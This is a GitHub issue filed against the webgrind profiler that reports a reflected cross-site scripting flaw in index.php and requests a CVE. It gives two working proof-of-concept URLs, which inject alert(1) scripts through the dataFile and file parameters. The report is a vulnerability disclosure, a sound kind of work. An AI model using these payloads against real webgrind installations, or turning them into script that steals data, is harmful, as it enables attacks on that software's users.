webgrind icon indicating copy to clipboard operation
webgrind copied to clipboard
verified publisher icon alpha0010

request cve: reflected Cross-Site Scripting (XSS)

Open ASkaterInTheCity opened this issue 2 years ago • 0 comments

Dear Sir.

I have detected a vulnerability reflected Cross-Site Scripting (XSS) via the /index.php (GET method), in dataFile and file parameter (differents requests) and I would like to request a CVE for it.

Examples: /webgrind/index.php?dataFile=%3C%2Fth%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cth%3E&costFormat=percent&showFraction=0.9&hideInternals=1&op=function_list

/webgrind/index.php?file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E&op=fileviewer

I hope to be of help. Best Regard

ASkaterInTheCity avatar Jul 20 '23 06:07 ASkaterInTheCity